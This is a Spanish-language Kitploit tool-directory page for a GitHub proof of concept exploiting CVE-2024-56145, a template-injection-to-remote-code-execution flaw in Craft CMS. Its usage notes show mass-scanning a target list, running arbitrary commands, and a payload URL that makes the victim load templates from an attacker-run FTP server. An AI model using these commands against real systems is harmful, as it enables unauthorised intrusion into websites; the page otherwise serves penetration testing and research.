Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-56145-craftcms-rce — CVE-2024-56145 SSTI a RCE - plantillas Twig | Kitploit
Herramientas/GitHubGitHub/sachinart/cve-2024-56145-craftcms-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubsachinart/cve-2024-56145-craftcms-rce

CVE-2024-56145-craftcms-rce

CVE-2024-56145 SSTI a RCE - plantillas Twig

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
43hace 1 añoAún no revisado

Antes de ejecutar el script de nuevo, haz

fuser -k 6666/tcp

Uso -

python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200

Se puede usar un comando personalizado como python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"

-i es tu IP o la IP de tu VPS (úsala ejecutando ipconfig / ifconfig).

Por ejemplo - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200

Explotación manual: ejecuta el poc.py anterior contra los objetivos que tengas; verás un archivo de salida con los objetivos vulnerables

¿Y ahora qué? ¿Tienes un objetivo vulnerable pero quieres jugar más? Por eso he añadido poc2.py, que sirve para pruebas manuales contra el objetivo. ¿Cómo se hace? haz fuser -k 6666/tcp

root@kitploit:~
1. Ejecuta poc2.py (se iniciará el puerto 6666 como FTP).
2. Abre el navegador en tutarget.com/?--templatesPath=ftp://IP-DEL-VPS:6666/
3. Verás -

image

Escrito por Chirag Artani (https://x.com/Chirag99Artani)

Descargar herramienta